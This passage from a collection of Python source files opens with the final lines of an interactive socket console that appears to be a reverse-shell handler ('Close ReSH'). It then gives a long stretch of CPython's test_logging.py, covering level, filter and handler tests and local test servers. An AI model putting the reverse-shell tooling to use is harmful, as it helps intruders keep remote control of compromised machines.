elif c == '²' or c == 'Ω':
sock.send(b'exit\n')
break
elif c == '\x13': # Ctrl+s
chc = choice()
if chc == '1':
break
c = ''
try:
sock.send(c.encode())
except BrokenPipeError:
break
except OSError:
print('\r\nOSError: Close ReSH\r')
break
except Exception as e:
print(e)
resetTTY(fd, oldSet)
sock.close()
serv.close()
thr.join()
|
test_logging.py
|
# Copyright 2001-2017 by Vinay Sajip. All Rights Reserved.
#
# Permission to use, copy, modify, and distribute this software and its
# documentation for any purpose and without fee is hereby granted,
# provided that the above copyright notice appear in all copies and that
# both that copyright notice and this permission notice appear in
# supporting documentation, and that the name of Vinay Sajip
# not be used in advertising or publicity pertaining to distribution
# of the software without specific, written prior permission.
# VINAY SAJIP DISCLAIMS ALL WARRANTIES WITH REGARD TO THIS SOFTWARE, INCLUDING
# ALL IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL
# VINAY SAJIP BE LIABLE FOR ANY SPECIAL, INDIRECT OR CONSEQUENTIAL DAMAGES OR
# ANY DAMAGES WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER
# IN AN ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT
# OF OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
"""Test harness for the logging module. Run all tests.
Copyright (C) 2001-2017 Vinay Sajip. All Rights Reserved.
"""
import logging
import logging.handlers
import logging.config
import codecs
import configparser
import datetime
import pathlib
import pickle
import io
import gc
import json
import os
import queue
import random
import re
import signal
import socket
import struct
import sys
import tempfile
from test.support.script_helper import assert_python_ok, assert_python_failure
from test import support
import textwrap
import threading
import time
import unittest
import warnings
import weakref
import asyncore
from http.server import HTTPServer, BaseHTTPRequestHandler
import smtpd
from urllib.parse import urlparse, parse_qs
from socketserver import (ThreadingUDPServer, DatagramRequestHandler,
ThreadingTCPServer, StreamRequestHandler)
try:
import win32evtlog, win32evtlogutil, pywintypes
except ImportError:
win32evtlog = win32evtlogutil = pywintypes = None
try:
import zlib
except ImportError:
pass
class BaseTest(unittest.TestCase):
"""Base class for logging tests."""
log_format = "%(name)s -> %(levelname)s: %(message)s"
expected_log_pat = r"^([\w.]+) -> (\w+): (\d+)$"
message_num = 0
def setUp(self):
"""Setup the default logging stream to an internal StringIO instance,
so that we can examine log output as we want."""
self._threading_key = support.threading_setup()
logger_dict = logging.getLogger().manager.loggerDict
logging._acquireLock()
try:
self.saved_handlers = logging._handlers.copy()
self.saved_handler_list = logging._handlerList[:]
self.saved_loggers = saved_loggers = logger_dict.copy()
self.saved_name_to_level = logging._nameToLevel.copy()
self.saved_level_to_name = logging._levelToName.copy()
self.logger_states = logger_states = {}
for name in saved_loggers:
logger_states[name] = getattr(saved_loggers[name],
'disabled', None)
finally:
logging._releaseLock()
# Set two unused loggers
self.logger1 = logging.getLogger("\xab\xd7\xbb")
self.logger2 = logging.getLogger("\u013f\u00d6\u0047")
self.root_logger = logging.getLogger("")
self.original_logging_level = self.root_logger.getEffectiveLevel()
self.stream = io.StringIO()
self.root_logger.setLevel(logging.DEBUG)
self.root_hdlr = logging.StreamHandler(self.stream)
self.root_formatter = logging.Formatter(self.log_format)
self.root_hdlr.setFormatter(self.root_formatter)
if self.logger1.hasHandlers():
hlist = self.logger1.handlers + self.root_logger.handlers
raise AssertionError('Unexpected handlers: %s' % hlist)
if self.logger2.hasHandlers():
hlist = self.logger2.handlers + self.root_logger.handlers
raise AssertionError('Unexpected handlers: %s' % hlist)
self.root_logger.addHandler(self.root_hdlr)
self.assertTrue(self.logger1.hasHandlers())
self.assertTrue(self.logger2.hasHandlers())
def tearDown(self):
"""Remove our logging stream, and restore the original logging
level."""
self.stream.close()
self.root_logger.removeHandler(self.root_hdlr)
while self.root_logger.handlers:
h = self.root_logger.handlers[0]
self.root_logger.removeHandler(h)
h.close()
self.root_logger.setLevel(self.original_logging_level)
logging._acquireLock()
try:
logging._levelToName.clear()
logging._levelToName.update(self.saved_level_to_name)
logging._nameToLevel.clear()
logging._nameToLevel.update(self.saved_name_to_level)
logging._handlers.clear()
logging._handlers.update(self.saved_handlers)
logging._handlerList[:] = self.saved_handler_list
manager = logging.getLogger().manager
manager.disable = 0
loggerDict = manager.loggerDict
loggerDict.clear()
loggerDict.update(self.saved_loggers)
logger_states = self.logger_states
for name in self.logger_states:
if logger_states[name] is not None:
self.saved_loggers[name].disabled = logger_states[name]
finally:
logging._releaseLock()
self.doCleanups()
support.threading_cleanup(*self._threading_key)
def assert_log_lines(self, expected_values, stream=None, pat=None):
"""Match the collected log lines against the regular expression
self.expected_log_pat, and compare the extracted group values to
the expected_values list of tuples."""
stream = stream or self.stream
pat = re.compile(pat or self.expected_log_pat)
actual_lines = stream.getvalue().splitlines()
self.assertEqual(len(actual_lines), len(expected_values))
for actual, expected in zip(actual_lines, expected_values):
match = pat.search(actual)
if not match:
self.fail("Log line does not match expected pattern:\n" +
actual)
self.assertEqual(tuple(match.groups()), expected)
s = stream.read()
if s:
self.fail("Remaining output at end of log stream:\n" + s)
def next_message(self):
"""Generate a message consisting solely of an auto-incrementing
integer."""
self.message_num += 1
return "%d" % self.message_num
class BuiltinLevelsTest(BaseTest):
"""Test builtin levels and their inheritance."""
def test_flat(self):
# Logging levels in a flat logger namespace.
m = self.next_message
ERR = logging.getLogger("ERR")
ERR.setLevel(logging.ERROR)
INF = logging.LoggerAdapter(logging.getLogger("INF"), {})
INF.setLevel(logging.INFO)
DEB = logging.getLogger("DEB")
DEB.setLevel(logging.DEBUG)
# These should log.
ERR.log(logging.CRITICAL, m())
ERR.error(m())
INF.log(logging.CRITICAL, m())
INF.error(m())
INF.warning(m())
INF.info(m())
DEB.log(logging.CRITICAL, m())
DEB.error(m())
DEB.warning(m())
DEB.info(m())
DEB.debug(m())
# These should not log.
ERR.warning(m())
ERR.info(m())
ERR.debug(m())
INF.debug(m())
self.assert_log_lines([
('ERR', 'CRITICAL', '1'),
('ERR', 'ERROR', '2'),
('INF', 'CRITICAL', '3'),
('INF', 'ERROR', '4'),
('INF', 'WARNING', '5'),
('INF', 'INFO', '6'),
('DEB', 'CRITICAL', '7'),
('DEB', 'ERROR', '8'),
('DEB', 'WARNING', '9'),
('DEB', 'INFO', '10'),
('DEB', 'DEBUG', '11'),
])
def test_nested_explicit(self):
# Logging levels in a nested namespace, all explicitly set.
m = self.next_message
INF = logging.getLogger("INF")
INF.setLevel(logging.INFO)
INF_ERR = logging.getLogger("INF.ERR")
INF_ERR.setLevel(logging.ERROR)
# These should log.
INF_ERR.log(logging.CRITICAL, m())
INF_ERR.error(m())
# These should not log.
INF_ERR.warning(m())
INF_ERR.info(m())
INF_ERR.debug(m())
self.assert_log_lines([
('INF.ERR', 'CRITICAL', '1'),
('INF.ERR', 'ERROR', '2'),
])
def test_nested_inherited(self):
# Logging levels in a nested namespace, inherited from parent loggers.
m = self.next_message
INF = logging.getLogger("INF")
INF.setLevel(logging.INFO)
INF_ERR = logging.getLogger("INF.ERR")
INF_ERR.setLevel(logging.ERROR)
INF_UNDEF = logging.getLogger("INF.UNDEF")
INF_ERR_UNDEF = logging.getLogger("INF.ERR.UNDEF")
UNDEF = logging.getLogger("UNDEF")
# These should log.
INF_UNDEF.log(logging.CRITICAL, m())
INF_UNDEF.error(m())
INF_UNDEF.warning(m())
INF_UNDEF.info(m())
INF_ERR_UNDEF.log(logging.CRITICAL, m())
INF_ERR_UNDEF.error(m())
# These should not log.
INF_UNDEF.debug(m())
INF_ERR_UNDEF.warning(m())
INF_ERR_UNDEF.info(m())
INF_ERR_UNDEF.debug(m())
self.assert_log_lines([
('INF.UNDEF', 'CRITICAL', '1'),
('INF.UNDEF', 'ERROR', '2'),
('INF.UNDEF', 'WARNING', '3'),
('INF.UNDEF', 'INFO', '4'),
('INF.ERR.UNDEF', 'CRITICAL', '5'),
('INF.ERR.UNDEF', 'ERROR', '6'),
])
def test_nested_with_virtual_parent(self):
# Logging levels when some parent does not exist yet.
m = self.next_message
INF = logging.getLogger("INF")
GRANDCHILD = logging.getLogger("INF.BADPARENT.UNDEF")
CHILD = logging.getLogger("INF.BADPARENT")
INF.setLevel(logging.INFO)
# These should log.
GRANDCHILD.log(logging.FATAL, m())
GRANDCHILD.info(m())
CHILD.log(logging.FATAL, m())
CHILD.info(m())
# These should not log.
GRANDCHILD.debug(m())
CHILD.debug(m())
self.assert_log_lines([
('INF.BADPARENT.UNDEF', 'CRITICAL', '1'),
('INF.BADPARENT.UNDEF', 'INFO', '2'),
('INF.BADPARENT', 'CRITICAL', '3'),
('INF.BADPARENT', 'INFO', '4'),
])
def test_regression_22386(self):
"""See issue #22386 for more information."""
self.assertEqual(logging.getLevelName('INFO'), logging.INFO)
self.assertEqual(logging.getLevelName(logging.INFO), 'INFO')
def test_regression_29220(self):
"""See issue #29220 for more information."""
logging.addLevelName(logging.INFO, '')
self.addCleanup(logging.addLevelName, logging.INFO, 'INFO')
self.assertEqual(logging.getLevelName(logging.INFO), '')
def test_issue27935(self):
fatal = logging.getLevelName('FATAL')
self.assertEqual(fatal, logging.FATAL)
def test_regression_29220(self):
"""See issue #29220 for more information."""
logging.addLevelName(logging.INFO, '')
self.addCleanup(logging.addLevelName, logging.INFO, 'INFO')
self.assertEqual(logging.getLevelName(logging.INFO), '')
self.assertEqual(logging.getLevelName(logging.NOTSET), 'NOTSET')
self.assertEqual(logging.getLevelName('NOTSET'), logging.NOTSET)
class BasicFilterTest(BaseTest):
"""Test the bundled Filter class."""
def test_filter(self):
# Only messages satisfying the specified criteria pass through the
# filter.
filter_ = logging.Filter("spam.eggs")
handler = self.root_logger.handlers[0]
try:
handler.addFilter(filter_)
spam = logging.getLogger("spam")
spam_eggs = logging.getLogger("spam.eggs")
spam_eggs_fish = logging.getLogger("spam.eggs.fish")
spam_bakedbeans = logging.getLogger("spam.bakedbeans")
spam.info(self.next_message())
spam_eggs.info(self.next_message()) # Good.
spam_eggs_fish.info(self.next_message()) # Good.
spam_bakedbeans.info(self.next_message())
self.assert_log_lines([
('spam.eggs', 'INFO', '2'),
('spam.eggs.fish', 'INFO', '3'),
])
finally:
handler.removeFilter(filter_)
def test_callable_filter(self):
# Only messages satisfying the specified criteria pass through the
# filter.
def filterfunc(record):
parts = record.name.split('.')
prefix = '.'.join(parts[:2])
return prefix == 'spam.eggs'
handler = self.root_logger.handlers[0]
try:
handler.addFilter(filterfunc)
spam = logging.getLogger("spam")
spam_eggs = logging.getLogger("spam.eggs")
spam_eggs_fish = logging.getLogger("spam.eggs.fish")
spam_bakedbeans = logging.getLogger("spam.bakedbeans")
spam.info(self.next_message())
spam_eggs.info(self.next_message()) # Good.
spam_eggs_fish.info(self.next_message()) # Good.
spam_bakedbeans.info(self.next_message())
self.assert_log_lines([
('spam.eggs', 'INFO', '2'),
('spam.eggs.fish', 'INFO', '3'),
])
finally:
handler.removeFilter(filterfunc)
def test_empty_filter(self):
f = logging.Filter()
r = logging.makeLogRecord({'name': 'spam.eggs'})
self.assertTrue(f.filter(r))
#
# First, we define our levels. There can be as many as you want - the only
# limitations are that they should be integers, the lowest should be > 0 and
# larger values mean less information being logged. If you need specific
# level values which do not fit into these limitations, you can use a
# mapping dictionary to convert between your application levels and the
# logging system.
#
SILENT = 120
TACITURN = 119
TERSE = 118
EFFUSIVE = 117
SOCIABLE = 116
VERBOSE = 115
TALKATIVE = 114
GARRULOUS = 113
CHATTERBOX = 112
BORING = 111
LEVEL_RANGE = range(BORING, SILENT + 1)
#
# Next, we define names for our levels. You don't need to do this - in which
# case the system will use "Level n" to denote the text for the level.
#
my_logging_levels = {
SILENT : 'Silent',
TACITURN : 'Taciturn',
TERSE : 'Terse',
EFFUSIVE : 'Effusive',
SOCIABLE : 'Sociable',
VERBOSE : 'Verbose',
TALKATIVE : 'Talkative',
GARRULOUS : 'Garrulous',
CHATTERBOX : 'Chatterbox',
BORING : 'Boring',
}
class GarrulousFilter(logging.Filter):
"""A filter which blocks garrulous messages."""
def filter(self, record):
return record.levelno != GARRULOUS
class VerySpecificFilter(logging.Filter):
"""A filter which blocks sociable and taciturn messages."""
def filter(self, record):
return record.levelno not in [SOCIABLE, TACITURN]
class CustomLevelsAndFiltersTest(BaseTest):
"""Test various filtering possibilities with custom logging levels."""
# Skip the logger name group.
expected_log_pat = r"^[\w.]+ -> (\w+): (\d+)$"
def setUp(self):
BaseTest.setUp(self)
for k, v in my_logging_levels.items():
logging.addLevelName(k, v)
def log_at_all_levels(self, logger):
for lvl in LEVEL_RANGE:
logger.log(lvl, self.next_message())
def test_logger_filter(self):
# Filter at logger level.
self.root_logger.setLevel(VERBOSE)
# Levels >= 'Verbose' are good.
self.log_at_all_levels(self.root_logger)
self.assert_log_lines([
('Verbose', '5'),
('Sociable', '6'),
('Effusive', '7'),
('Terse', '8'),
('Taciturn', '9'),
('Silent', '10'),
])
def test_handler_filter(self):
# Filter at handler level.
self.root_logger.handlers[0].setLevel(SOCIABLE)
try:
# Levels >= 'Sociable' are good.
self.log_at_all_levels(self.root_logger)
self.assert_log_lines([
('Sociable', '6'),
('Effusive', '7'),
('Terse', '8'),
('Taciturn', '9'),
('Silent', '10'),
])
finally:
self.root_logger.handlers[0].setLevel(logging.NOTSET)
def test_specific_filters(self):
# Set a specific filter object on the handler, and then add another
# filter object on the logger itself.
handler = self.root_logger.handlers[0]
specific_filter = None
garr = GarrulousFilter()
handler.addFilter(garr)
try:
self.log_at_all_levels(self.root_logger)
first_lines = [
# Notice how 'Garrulous' is missing
('Boring', '1'),
('Chatterbox', '2'),
('Talkative', '4'),
('Verbose', '5'),
('Sociable', '6'),
('Effusive', '7'),
('Terse', '8'),
('Taciturn', '9'),
('Silent', '10'),
]
self.assert_log_lines(first_lines)
specific_filter = VerySpecificFilter()
self.root_logger.addFilter(specific_filter)
self.log_at_all_levels(self.root_logger)
self.assert_log_lines(first_lines + [
# Not only 'Garrulous' is still missing, but also 'Sociable'
# and 'Taciturn'
('Boring', '11'),
('Chatterbox', '12'),
('Talkative', '14'),
('Verbose', '15'),
('Effusive', '17'),
('Terse', '18'),
('Silent', '20'),
])
finally:
if specific_filter:
self.root_logger.removeFilter(specific_filter)
handler.removeFilter(garr)
class HandlerTest(BaseTest):
def test_name(self):
h = logging.Handler()
h.name = 'generic'
self.assertEqual(h.name, 'generic')
h.name = 'anothergeneric'
self.assertEqual(h.name, 'anothergeneric')
self.assertRaises(NotImplementedError, h.emit, None)
def test_builtin_handlers(self):
# We can't actually *use* too many handlers in the tests,
# but we can try instantiating them with various options
if sys.platform in ('linux', 'darwin'):
for existing in (True, False):
fd, fn = tempfile.mkstemp()
os.close(fd)
if not existing:
os.unlink(fn)
h = logging.handlers.WatchedFileHandler(fn, delay=True)
if existing:
dev, ino = h.dev, h.ino
self.assertEqual(dev, -1)
self.assertEqual(ino, -1)
r = logging.makeLogRecord({'msg': 'Test'})
h.handle(r)
# Now remove the file.
os.unlink(fn)
self.assertFalse(os.path.exists(fn))
# The next call should recreate the file.
h.handle(r)
self.assertTrue(os.path.exists(fn))
else:
self.assertEqual(h.dev, -1)
self.assertEqual(h.ino, -1)
h.close()
if existing:
os.unlink(fn)
if sys.platform == 'darwin':
sockname = '/var/run/syslog'
else:
sockname = '/dev/log'
try:
h = logging.handlers.SysLogHandler(sockname)
self.assertEqual(h.facility, h.LOG_USER)
self.assertTrue(h.unixsocket)
h.close()
except OSError: # syslogd might not be available
pass
for method in ('GET', 'POST', 'PUT'):
if method == 'PUT':
self.assertRaises(ValueError, logging.handlers.HTTPHandler,
'localhost', '/log', method)
else:
h = logging.handlers.HTTPHandler('localhost', '/log', method)
h.close()
h = logging.handlers.BufferingHandler(0)
r = logging.makeLogRecord({})
self.assertTrue(h.shouldFlush(r))
h.close()
h = logging.handlers.BufferingHandler(1)
self.assertFalse(h.shouldFlush(r))
h.close()
def test_path_objects(self):
"""
Test that Path objects are accepted as filename arguments to handlers.
See Issue #27493.
"""
fd, fn = tempfile.mkstemp()
os.close(fd)
os.unlink(fn)
pfn = pathlib.Path(fn)
cases = (
(logging.FileHandler, (pfn, 'w')),
(logging.handlers.RotatingFileHandler, (pfn, 'a')),
(logging.handlers.TimedRotatingFileHandler, (pfn, 'h')),
)
if sys.platform in ('linux', 'darwin'):
cases += ((logging.handlers.WatchedFileHandler, (pfn, 'w')),)
for cls, args in cases:
h = cls(*args)
self.assertTrue(os.path.exists(fn))
h.close()
os.unlink(fn)
@unittest.skipIf(os.name == 'nt', 'WatchedFileHandler not appropriate for Windows.')
def test_race(self):
# Issue #14632 refers.
def remove_loop(fname, tries):
for _ in range(tries):
try:
os.unlink(fname)
self.deletion_time = time.time()
except OSError:
pass
time.sleep(0.004 * random.randint(0, 4))
del_count = 500
log_count = 500
self.handle_time = None
self.deletion_time = None
for delay in (False, True):
fd, fn = tempfile.mkstemp('.log', 'test_logging-3-')
os.close(fd)
remover = threading.Thread(target=remove_loop, args=(fn, del_count))
remover.daemon = True
remover.start()
h = logging.handlers.WatchedFileHandler(fn, delay=delay)
f = logging.Formatter('%(asctime)s: %(levelname)s: %(message)s')
h.setFormatter(f)
try:
for _ in range(log_count):
time.sleep(0.005)
r = logging.makeLogRecord({'msg': 'testing' })
try:
self.handle_time = time.time()
h.handle(r)
except Exception:
print('Deleted at %s, '
'opened at %s' % (self.deletion_time,
self.handle_time))
raise
finally:
remover.join()
h.close()
if os.path.exists(fn):
os.unlink(fn)
# The implementation relies on os.register_at_fork existing, but we test
# based on os.fork existing because that is what users and this test use.
# This helps ensure that when fork exists (the important concept) that the
# register_at_fork mechanism is also present and used.
@unittest.skipIf(not hasattr(os, 'fork'), 'Test requires os.fork().')
def test_post_fork_child_no_deadlock(self):
"""Ensure child logging locks are not held; bpo-6721 & bpo-36533."""
class _OurHandler(logging.Handler):
def __init__(self):
super().__init__()
self.sub_handler = logging.StreamHandler(
stream=open('/dev/null', 'wt'))
def emit(self, record):
self.sub_handler.acquire()
try:
self.sub_handler.emit(record)
finally:
self.sub_handler.release()
self.assertEqual(len(logging._handlers), 0)
refed_h = _OurHandler()
self.addCleanup(refed_h.sub_handler.stream.close)
refed_h.name = 'because we need at least one for this test'
self.assertGreater(len(logging._handlers), 0)
self.assertGreater(len(logging._at_fork_reinit_lock_weakset), 1)
test_logger = logging.getLogger('test_post_fork_child_no_deadlock')
test_logger.addHandler(refed_h)
test_logger.setLevel(logging.DEBUG)
locks_held__ready_to_fork = threading.Event()
fork_happened__release_locks_and_end_thread = threading.Event()
def lock_holder_thread_fn():
logging._acquireLock()
try:
refed_h.acquire()
try:
# Tell the main thread to do the fork.
locks_held__ready_to_fork.set()
# If the deadlock bug exists, the fork will happen
# without dealing with the locks we hold, deadlocking
# the child.
# Wait for a successful fork or an unreasonable amount of
# time before releasing our locks. To avoid a timing based
# test we'd need communication from os.fork() as to when it
# has actually happened. Given this is a regression test
# for a fixed issue, potentially less reliably detecting
# regression via timing is acceptable for simplicity.
# The test will always take at least this long. :(
fork_happened__release_locks_and_end_thread.wait(0.5)
finally:
refed_h.release()
finally:
logging._releaseLock()
lock_holder_thread = threading.Thread(
target=lock_holder_thread_fn,
name='test_post_fork_child_no_deadlock lock holder')
lock_holder_thread.start()
locks_held__ready_to_fork.wait()
pid = os.fork()
if pid == 0: # Child.
try:
test_logger.info(r'Child process did not deadlock. \o/')
finally:
os._exit(0)
else: # Parent.
test_logger.info(r'Parent process returned from fork. \o/')
fork_happened__release_locks_and_end_thread.set()
lock_holder_thread.join()
start_time = time.monotonic()
while True:
test_logger.debug('Waiting for child process.')
waited_pid, status = os.waitpid(pid, os.WNOHANG)
if waited_pid == pid:
break # child process exited.
if time.monotonic() - start_time > 7:
break # so long? implies child deadlock.
time.sleep(0.05)
test_logger.debug('Done waiting.')
if waited_pid != pid:
os.kill(pid, signal.SIGKILL)
waited_pid, status = os.waitpid(pid, 0)
self.fail("child process deadlocked.")
self.assertEqual(status, 0, msg="child process error")
class BadStream(object):
def write(self, data):
raise RuntimeError('deliberate mistake')
class TestStreamHandler(logging.StreamHandler):
def handleError(self, record):
self.error_record = record
class StreamWithIntName(object):
level = logging.NOTSET
name = 2
class StreamHandlerTest(BaseTest):
def test_error_handling(self):
h = TestStreamHandler(BadStream())
r = logging.makeLogRecord({})
old_raise = logging.raiseExceptions
try:
h.handle(r)
self.assertIs(h.error_record, r)
h = logging.StreamHandler(BadStream())
with support.captured_stderr() as stderr:
h.handle(r)
msg = '\nRuntimeError: deliberate mistake\n'
self.assertIn(msg, stderr.getvalue())
logging.raiseExceptions = False
with support.captured_stderr() as stderr:
h.handle(r)
self.assertEqual('', stderr.getvalue())
finally:
logging.raiseExceptions = old_raise
def test_stream_setting(self):
"""
Test setting the handler's stream
"""
h = logging.StreamHandler()
stream = io.StringIO()
old = h.setStream(stream)
self.assertIs(old, sys.stderr)
actual = h.setStream(old)
self.assertIs(actual, stream)
# test that setting to existing value returns None
actual = h.setStream(old)
self.assertIsNone(actual)
def test_can_represent_stream_with_int_name(self):
h = logging.StreamHandler(StreamWithIntName())
self.assertEqual(repr(h), '<StreamHandler 2 (NOTSET)>')
# -- The following section could be moved into a server_helper.py module
# -- if it proves to be of wider utility than just test_logging
class TestSMTPServer(smtpd.SMTPServer):
"""
This class implements a test SMTP server.
:param addr: A (host, port) tuple which the server listens on.
You can specify a port value of zero: the server's
*port* attribute will hold the actual port number
used, which can be used in client connections.
:param handler: A callable which will be called to process
incoming messages. The handler will be passed
the client address tuple, who the message is from,
a list of recipients and the message data.
:param poll_interval: The interval, in seconds, used in the underlying
:func:`select` or :func:`poll` call by
:func:`asyncore.loop`.
:param sockmap: A dictionary which will be used to hold
:class:`asyncore.dispatcher` instances used by
:func:`asyncore.loop`. This avoids changing the
:mod:`asyncore` module's global state.
"""
def __init__(self, addr, handler, poll_interval, sockmap):
smtpd.SMTPServer.__init__(self, addr, None, map=sockmap,
decode_data=True)
self.port = self.socket.getsockname()[1]
self._handler = handler
self._thread = None
self.poll_interval = poll_interval
def process_message(self, peer, mailfrom, rcpttos, data):
"""
Delegates to the handler passed in to the server's constructor.
Typically, this will be a test case method.
:param peer: The client (host, port) tuple.
:param mailfrom: The address of the sender.
:param rcpttos: The addresses of the recipients.
:param data: The message.
"""
self._handler(peer, mailfrom, rcpttos, data)
def start(self):
"""
Start the server running on a separate daemon thread.
"""
self._thread = t = threading.Thread(target=self.serve_forever,
args=(self.poll_interval,))
t.setDaemon(True)
t.start()
def serve_forever(self, poll_interval):
"""
Run the :mod:`asyncore` loop until normal termination
conditions arise.
:param poll_interval: The interval, in seconds, used in the underlying
:func:`select` or :func:`poll` call by
:func:`asyncore.loop`.
"""
asyncore.loop(poll_interval, map=self._map)
def stop(self, timeout=None):
"""
Stop the thread by closing the server instance.
Wait for the server thread to terminate.
:param timeout: How long to wait for the server thread
to terminate.
"""
self.close()
support.join_thread(self._thread, timeout)
self._thread = None
asyncore.close_all(map=self._map, ignore_all=True)
class ControlMixin(object):
"""
This mixin is used to start a server on a separate thread, and
shut it down programmatically. Request handling is simplified - instead
of needing to derive a suitable RequestHandler subclass, you just
provide a callable which will be passed each received request to be
processed.
:param handler: A handler callable which will be called with a
single parameter - the request - in order to
process the request. This handler is called on the
server thread, effectively meaning that requests are
processed serially. While not quite Web scale ;-),
this should be fine for testing applications.
:param poll_interval: The polling interval in seconds.
"""
def __init__(self, handler, poll_interval):
self._thread = None
self.poll_interval = poll_interval
self._handler = handler
self.ready = threading.Event()
def start(self):
"""
Create a daemon thread to run the server, and start it.
"""
self._thread = t = threading.Thread(target=self.serve_forever,
args=(self.poll_interval,))
t.setDaemon(True)
t.start()
def serve_forever(self, poll_interval):
"""
Run the server. Set the ready flag before entering the
service loop.
"""
self.ready.set()
super(ControlMixin, self).serve_forever(poll_interval)
def stop(self, timeout=None):
"""
Tell the server thread to stop, and wait for it to do so.
:param timeout: How long to wait for the server thread
to terminate.
"""
self.shutdown()
if self._thread is not None:
support.join_thread(self._thread, timeout)
self._thread = None
self.server_close()
self.ready.clear()
class TestHTTPServer(ControlMixin, HTTPServer):
"""
An HTTP server which is controllable using :class:`ControlMixin`.
:param addr: A tuple with the IP address and port to listen on.
:param handler: A handler callable which will be called with a
single parameter - the request - in order to
process the request.
:param poll_interval: The polling interval in seconds.
:param log: Pass ``True`` to enable log messages.
"""
def __init__(self, addr, handler, poll_interval=0.5,
log=False, sslctx=None):
class DelegatingHTTPRequestHandler(BaseHTTPRequestHandler):
def __getattr__(self, name, default=None):
if name.startswith('do_'):
return self.process_request
raise AttributeError(name)
def process_request(self):
self.server._handler(self)
def log_message(self, format, *args):
if log:
super(DelegatingHTTPRequestHandler,
self).log_message(format, *args)
HTTPServer.__init__(self, addr, DelegatingHTTPRequestHandler)
ControlMixin.__init__(self, handler, poll_interval)
self.sslctx = sslctx
def get_request(self):
try:
sock, addr = self.socket.accept()
if self.sslctx:
sock = self.sslctx.wrap_socket(sock, server_side=True)
except OSError as e:
# socket errors are silenced by the caller, print them here
sys.stderr.write("Got an error:\n%s\n" % e)
raise
return sock, addr
class TestTCPServer(ControlMixin, ThreadingTCPServer):
"""
A TCP server which is controllable using :class:`ControlMixin`.
:param addr: A tuple with the IP address and port to listen on.
:param handler: A handler callable which will be called with a single
parameter - the request - in order to process the request.
:param poll_interval: The polling interval in seconds.
:bind_and_activate: If True (the default), binds the server and starts it
listening. If False, you need to call
:meth:`server_bind` and :meth:`server_activate` at
some later time before calling :meth:`start`, so that
the server will set up the socket and listen on it.
"""
allow_reuse_address = True
def __init__(self, addr, handler, poll_interval=0.5,
bind_and_activate=True):
class DelegatingTCPRequestHandler(StreamRequestHandler):
def handle(self):
self.server._handler(self)
ThreadingTCPServer.__init__(self, addr, DelegatingTCPRequestHandler,
bind_and_activate)
ControlMixin.__init__(self, handler, poll_interval)
def server_bind(self):
super(TestTCPServer, self).server_bind()
self.port = self.socket.getsockname()[1]
class TestUDPServer(ControlMixin, ThreadingUDPServer):
"""
A UDP server which is controllable using :class:`ControlMixin`.
:param addr: A tuple with the IP address and port to listen on.
:param handler: A handler callable which will be called with a
single parameter - the request - in order to
process the request.
:param poll_interval: The polling interval for shutdown requests,
in seconds.
:bind_and_activate: If True (the default), binds the server and
starts it listening. If False, you need to
call :meth:`server_bind` and
:meth:`server_activate` at some later time
before calling :meth:`start`, so that the server will
set up the socket and listen on it.
"""
def __init__(self, addr, handler, poll_interval=0.5,
bind_and_activate=True):
class DelegatingUDPRequestHandler(DatagramRequestHandler):
def handle(self):
self.server._handler(self)
def finish(self):
data = self.wfile.getvalue()
if data:
try:
super(DelegatingUDPRequestHandler, self).finish()
except OSError:
if not self.server._closed:
raise
ThreadingUDPServer.__init__(self, addr,
DelegatingUDPRequestHandler,
bind_and_activate)
ControlMixin.__init__(self, handler, poll_interval)
self._closed = False
def server_bind(self):
super(TestUDPServer, self).server_bind()
self.port = self.socket.getsockname()[1]
def server_close(self):
super(TestUDPServer, self).server_close()
self._closed = True
if hasattr(socket, "AF_UNIX"):
class TestUnixStreamServer(TestTCPServer):
address_family = socket.AF_UNIX
class TestUnixDatagramServer(TestUDPServer):
address_family = socket.AF_UNIX
# - end of server_helper section
class SMTPHandlerTest(BaseTest):
# bpo-14314, bpo-19665, bpo-34092: don't wait forever, timeout of 1 minute
TIMEOUT = 60.0
def test_basic(self):
sockmap = {}
server = TestSMTPServer((support.HOST, 0), self.process_message, 0.001,
sockmap)
server.start()
addr = (support.HOST, server.port)
h = logging.handlers.SMTPHandler(addr, 'me', 'you', 'Log',
timeout=self.TIMEOUT)
self.assertEqual(h.toaddrs, ['you'])
self.messages = []
r = logging.makeLogRecord({'msg': 'Hello \u2713'})
self.handled = threading.Event()
h.handle(r)
self.handled.wait(self.TIMEOUT)
server.stop()
self.assertTrue(self.handled.is_set())
self.assertEqual(len(self.messages), 1)
peer, mailfrom, rcpttos, data = self.messages[0]
self.assertEqual(mailfrom, 'me')
self.assertEqual(rcpttos, ['you'])
self.assertIn('\nSubject: Log\n', data)
self.assertTrue(data.endswith('\n\nHello \u2713'))
h.close()
def process_message(self, *args):
self.messages.append(args)
self.handled.set()
class MemoryHandlerTest(BaseTest):
"""Tests for the MemoryHandler."""
# Do not bother with a logger name group.
expected_log_pat = r"^[\w.]+ -> (\w+): (\d+)$"
def setUp(self):
BaseTest.setUp(self)
self.mem_hdlr = logging.handlers.MemoryHandler(10, logging.WARNING,
self.root_hdlr)
self.mem_logger = logging.getLogger('mem')
self.mem_logger.propagate = 0
self.mem_logger.addHandler(self.mem_hdlr)
def tearDown(self):
self.mem_hdlr.close()
BaseTest.tearDown(self)
def test_flush(self):
# The memory handler flushes to its target handler based on specific
# criteria (message count and message level).
self.mem_logger.debug(self.next_message())
self.assert_log_lines([])
self.mem_logger.info(self.next_message())
self.assert_log_lines([])
# This will flush because the level is >= logging.WARNING
self.mem_logger.warning(self.next_message())
lines = [
('DEBUG', '1'),
('INFO', '2'),
('WARNING', '3'),
]
self.assert_log_lines(lines)
for n in (4, 14):
for i in range(9):
self.mem_logger.debug(self.next_message())
self.assert_log_lines(lines)
# This will flush because it's the 10th message since the last
# flush.
self.mem_logger.debug(self.next_message())
lines = lines + [('DEBUG', str(i)) for i in range(n, n + 10)]
self.assert_log_lines(lines)
self.mem_logger.debug(self.next_message())
self.assert_log_lines(lines)
def test_flush_on_close(self):
"""
Test that the flush-on-close configuration works as expected.
"""
self.mem_logger.debug(self.next_message())
self.assert_log_lines([])
self.mem_logger.info(self.next_message())
self.assert_log_lines([])
self.mem_logger.removeHandler(self.mem_hdlr)
# Default behaviour is to flush on close. Check that it happens.
self.mem_hdlr.close()
lines = [
('DEBUG', '1'),
('INFO', '2'),
]
